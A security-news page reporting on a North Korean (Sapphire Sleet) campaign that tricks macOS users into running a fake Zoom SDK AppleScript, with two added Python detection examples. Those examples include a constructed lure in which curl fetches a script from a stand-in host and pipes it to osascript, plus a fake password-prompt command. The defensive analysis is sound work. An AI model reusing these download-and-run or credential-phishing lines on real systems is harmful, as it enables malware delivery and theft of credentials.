Security News

Cybersecurity news aggregator

Severity: HIGH | Category: Attacks | Source: The Register Security

North Korea targets macOS users in latest heist

North Korean threat actor Sapphire Sleet (APT38) is targeting macOS users via a social engineering campaign that delivers a malicious AppleScript disguised as a Zoom SDK update. The attack begins with fake job offers on platforms like LinkedIn, leading to a technical interview where victims are instructed to download and run the script, which hides malicious code behind thousands of blank lines to evade detection. The script then downloads and executes additional payloads to steal credentials and cryptocurrency.

Cyber-crime
North Korea targets macOS users in latest heist
Social engineering: 'low-cost, hard to patch, and scales well'
By Jessica Lyons, Thu 16 Apr 2026 // 18:20 UTC

North Korean criminals set on stealing Apple users' credentials and cryptocurrency are using a combination of social engineering and a fake Zoom software update to trick people into manually running malware on their own computers, according to Microsoft.

Redmond's threat intelligence team tracks the Pyongyang-backed crew as Sapphire Sleet (aka APT38). The Lazarus Group offshoot has been in business since at least 2020, and primarily targets the finance sector to steal cryptocurrency wallets and intellectual property related to cryptocurrency trading and blockchain platforms.

These attacks begin with social engineering. The crew creates fake recruiter profiles on social media and networking platforms like LinkedIn and then reaches out to finance professionals with phony job opportunities before scheduling a technical interview - that's the delivery mechanism for the malware.

And they follow a rash of other social-engineering-enabled intrusions, including one in which North Korea-linked attackers socially engineered an Axios maintainer, compromised his account, and published malicious versions of the open source JavaScript library containing a remote-access trojan.

"Social engineering lets attackers route around hardened perimeters by convincing users to act on their behalf, turning a human into the vulnerability. It's low-cost, hard to patch, and scales well," Sherrod DeGrippo, Microsoft global threat intelligence GM, told The Register.

"Users are conditioned to accept remote support interactions like downloading tools, following instructions, clicking prompts," she added. "Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise."
In its latest campaign, Sapphire Sleet sends victims a fake Zoom support meeting invite, and then instructs them to download a file called Zoom SDK Update.scpt. It's a compiled AppleScript that opens in macOS Script Editor by default and looks like a legitimate Zoom SDK update, beginning with a large comment block of update instructions to make it appear to be a real software update. Opening a .scpt in Script Editor displays it rather than executing it; the victim still has to press Run, and that is the step the fake interview instructions walk them through.

Bad Apple(Script) commands

Underneath the decoy content, the script inserts thousands of blank lines to push the malicious logic below the scrollable view of the Script Editor window and reduce the chances of the victim noticing it.

First, it launches a command that invokes the legitimate macOS softwareupdate binary - but with an invalid parameter. The call fails on the bad argument and does nothing useful, but it still spawns a trusted Apple-signed process, so anyone glancing at the process list sees a genuine software-update binary running. Next, the script executes its malicious payload via curl to fetch a new attacker-controlled AppleScript that launches directly within the Script Editor context and ensures that additional payloads are dynamically downloaded and executed.

"When the user opens the Zoom SDK Update.scpt file, macOS launches the file in Script Editor, allowing Sapphire Sleet to transition from a single lure file to a multi-stage, dynamically fetched payload chain," Redmond explained in a Thursday report. "From this single process, the entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier."
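A static triage pass over a decompiled lure, written here as an added example (it is not code from the article or from Microsoft's report). It assumes the .scpt has already been turned into text, either with Apple's osadecompile tool or by copying it out of the Script Editor window, and then looks for the traits described above: a decoy comment followed by a very long run of blank lines, a softwareupdate call inside a do shell script, and a curl stage with a custom user-agent whose output is piped straight into osascript. The sample script, its hostname (on the reserved .invalid TLD) and its user-agent string are constructed for the demonstration and are not indicators from the campaign; the 200-line blank-run threshold is an assumption.

```python
"""Static triage of a decompiled AppleScript lure (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample imitating the described layout: decoy comment, thousands
# of blank lines, a decoy softwareupdate call, then curl piped into osascript.
# Hostname and user-agent are invented; they are not IoCs.
SAMPLE_SCRIPT = (
    "(*\n"
    "  Zoom SDK Update 6.2.1\n"
    "  Run this script to update the Zoom meeting SDK.\n"
    "*)\n"
    + "\n" * 3000
    + 'do shell script "softwareupdate --not-a-real-flag"\n'
    + 'do shell script "curl -s -A \'zsdk-stage1\' '
    + 'https://updates.example.invalid/s1 | osascript -"\n'
)

# Body of a `do shell script "..."` call, honouring \" escapes inside it.
SHELL_CALL = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')
USER_AGENT = re.compile(r"""(?:-A|--user-agent)\s+(?:'([^']*)'|"([^"]*)"|(\S+))""")
URL = re.compile(r"""https?://[^\s"'|]+""")
# curl output fed directly into an interpreter: the "download and run" shape.
PIPE_TO_INTERPRETER = re.compile(r"\bcurl\b.*\|\s*(?:osascript|sh|bash|zsh|python3?)\b")

BLANK_RUN_THRESHOLD = 200  # assumption: no legitimate script pads this much


@dataclass
class Findings:
    max_blank_run: int = 0
    shell_commands: list = field(default_factory=list)
    user_agents: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    invokes_softwareupdate: bool = False
    remote_script_exec: bool = False

    @property
    def suspicious(self) -> bool:
        return self.remote_script_exec or self.max_blank_run >= BLANK_RUN_THRESHOLD


def longest_blank_run(text: str) -> int:
    """Length of the longest run of consecutive whitespace-only lines."""
    longest = current = 0
    for line in text.split("\n"):
        current = current + 1 if not line.strip() else 0
        longest = max(longest, current)
    return longest


def triage(text: str) -> Findings:
    """Extract shell commands, URLs and user-agents, and flag the lure traits."""
    f = Findings(max_blank_run=longest_blank_run(text))
    for cmd in SHELL_CALL.findall(text):
        f.shell_commands.append(cmd)
        f.urls.extend(URL.findall(cmd))
        # Only one of the three alternation groups matches per user-agent.
        f.user_agents.extend(next(g for g in m.groups() if g is not None)
                             for m in USER_AGENT.finditer(cmd))
        if re.match(r"\s*softwareupdate\b", cmd):
            f.invokes_softwareupdate = True  # decoy in this campaign
        if PIPE_TO_INTERPRETER.search(cmd):
            f.remote_script_exec = True
    return f


if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print(f"suspicious={result.suspicious} blank_run={result.max_blank_run}")
    for cmd in result.shell_commands:
        print("  shell:", cmd)
    print("  user-agents:", result.user_agents, "urls:", result.urls)
```

The user-agent and URL lists are the useful output for a responder: the per-stage user-agent strings are what Microsoft says the crew uses as tracking identifiers, so they double as pivot points for proxy and DNS log searches.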
Each curl user agent fetches a different piece of malware that serves its own purpose in the attack chain, from orchestration and backdooring victims' machines, to reconnaissance and registering the compromised system with Sapphire Sleet's command-and-control (C2) infrastructure, to bypassing macOS TCC (Transparency, Consent, and Control) protections, and ultimately harvesting credentials and exfiltrating sensitive data - wallets, browser history and other info, keychains, Apple Notes, and Telegram login details.

Each stage of the campaign also abuses native Apple tools or mimics Apple naming conventions to disguise the illicit activity. For example: the host monitoring binary is called com.apple.cli to help mask the 5 MB Mach-O executable with an Apple-style naming convention. The credential stealer, delivered through an AppleScript payload executed via osascript, drops a malicious macOS application named systemupdate.app that masquerades as a software update utility and, when launched, displays a native macOS password dialog that closely resembles a legitimate system prompt. The dialog prompts the user to enter their password "to complete a software update," and this allows Sapphire Sleet to obtain valid user credentials, exfiltrating them by using the Telegram Bot API.

Additionally, one of the backdoors used in this campaign - icloudz - is named to mimic a legitimate iCloud-related artifact, and also uses the macOS NSCreateObjectFileImageFromMemory API to load additional payloads directly into memory, so the loaded code never has to touch disk where XProtect or a file scanner would see it.

Microsoft disclosed this campaign to Apple, and the Mac maker has since implemented "platform-level protections to help detect and block infrastructure and malware associated with this campaign," we're told.
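The lure-to-payload chain is easier to catch on process lineage than on file hashes, because every stage runs under Script Editor and the names rotate. Below is an added detection example (not from the article or from Microsoft's report) that walks a set of process-execution records and flags: any shell, curl or osascript with Script Editor as an ancestor; the decoy softwareupdate call under Script Editor; curl setting a custom user-agent under Script Editor; an osascript password prompt built with a hidden-answer display dialog; and a binary with an Apple-style com.apple.* name running outside Apple's own directories. The event schema (pid, ppid, path, args) is a simplified invention for the demonstration, and the records are constructed to model the chain described above plus two benign controls; a real EDR or Endpoint Security feed supplies the same fields under its own names. The hidden-answer rule is a general heuristic for script-driven password prompts; the article does not say how systemupdate.app constructs its dialog.

```python
"""Process-lineage detection for the Script Editor -> sh -> curl -> osascript
chain (added example; constructed telemetry, invented schema)."""
from collections import defaultdict
from os.path import basename

SCRIPT_EDITOR = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
# Prefixes where Apple-named binaries legitimately live on macOS.
APPLE_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
INTERPRETERS = {"sh", "bash", "zsh", "curl", "osascript"}

# Constructed records: pids 100-107 model the described chain; 200 and 201
# are benign controls the rules must leave alone. Paths/hosts are made up.
EVENTS = [
    {"pid": 100, "ppid": 1, "path": SCRIPT_EDITOR,
     "args": ["Script Editor", "/Users/alice/Downloads/Zoom SDK Update.scpt"]},
    {"pid": 101, "ppid": 100, "path": "/bin/sh",
     "args": ["sh", "-c", "softwareupdate --not-a-real-flag"]},
    {"pid": 102, "ppid": 101, "path": "/usr/sbin/softwareupdate",
     "args": ["softwareupdate", "--not-a-real-flag"]},
    {"pid": 103, "ppid": 100, "path": "/bin/sh",
     "args": ["sh", "-c", "curl -s -A 'zsdk-stage1' "
              "https://updates.example.invalid/s1 | osascript -"]},
    {"pid": 104, "ppid": 103, "path": "/usr/bin/curl",
     "args": ["curl", "-s", "-A", "zsdk-stage1", "https://updates.example.invalid/s1"]},
    {"pid": 105, "ppid": 103, "path": "/usr/bin/osascript", "args": ["osascript", "-"]},
    {"pid": 106, "ppid": 105, "path": "/Users/alice/Library/Caches/com.apple.cli",
     "args": ["com.apple.cli"]},
    {"pid": 107, "ppid": 105, "path": "/usr/bin/osascript",
     "args": ["osascript", "-e",
              'display dialog "Enter your password to complete a software update" '
              'default answer "" with hidden answer']},
    {"pid": 200, "ppid": 1, "path": "/usr/sbin/softwareupdate",
     "args": ["softwareupdate", "-l"]},
    {"pid": 201, "ppid": 1, "path": "/usr/bin/osascript",
     "args": ["osascript", "-e", 'display notification "backup finished"']},
]


def ancestors(by_pid, pid):
    """Yield parent, grandparent, ... until the recorded tree runs out."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            yield by_pid[pid]


def detect(events):
    """Return {pid: sorted rule names} for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(set)
    for e in events:
        name = basename(e["path"])
        argv = " ".join(e["args"])
        under_editor = any(a["path"] == SCRIPT_EDITOR
                           for a in ancestors(by_pid, e["pid"]))
        if under_editor and name in INTERPRETERS:
            hits[e["pid"]].add("interpreter_under_script_editor")
        if under_editor and name == "softwareupdate":
            hits[e["pid"]].add("softwareupdate_under_script_editor")  # decoy call
        if under_editor and name == "curl" and (
                "-A" in e["args"] or "--user-agent" in e["args"]):
            hits[e["pid"]].add("curl_custom_user_agent_under_script_editor")
        if name == "osascript" and "display dialog" in argv and "hidden answer" in argv:
            hits[e["pid"]].add("osascript_hidden_password_prompt")
        if name.startswith("com.apple.") and not e["path"].startswith(APPLE_PREFIXES):
            hits[e["pid"]].add("apple_name_outside_apple_path")
    return {pid: sorted(rules) for pid, rules in hits.items()}


if __name__ == "__main__":
    for pid, rules in sorted(detect(EVENTS).items()):
        print(pid, ", ".join(rules))
```

The lineage rule does most of the work: a legitimate softwareupdate run from a terminal (pid 200) and a routine osascript notification (pid 201) are untouched, while every stage spawned beneath Script Editor is flagged regardless of what the downloaded script was renamed to.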
Apple did not respond to The Register's inquiries. According to Redmond, however, Apple deployed Apple Safe Browsing protections in Safari to detect and block malicious infrastructure associated with this campaign, and also deployed XProtect signatures to detect and block the malware families linked to Sapphire Sleet. macOS devices receive XProtect signature updates automatically, independently of macOS point releases, so there is nothing for an individual user to do; administrators who want to confirm a fleet has picked them up can compare the version string in /Library/Apple/System/Library/CoreServices/XProtect.bundle/Contents/Info.plist across machines. Signature-based detection also only covers the samples Apple has seen, so it does not replace the user-side controls below.

One thing organizations can do to protect their users and themselves from falling victim to this and other social-engineering campaigns is to educate people about threats originating from LinkedIn and other social media sites, especially unsolicited communications asking users to download software or install virtual meeting tools.

"Users should never run scripts or commands shared through messages, calls, or chats without prior approval from their IT or security teams," Redmond warns.
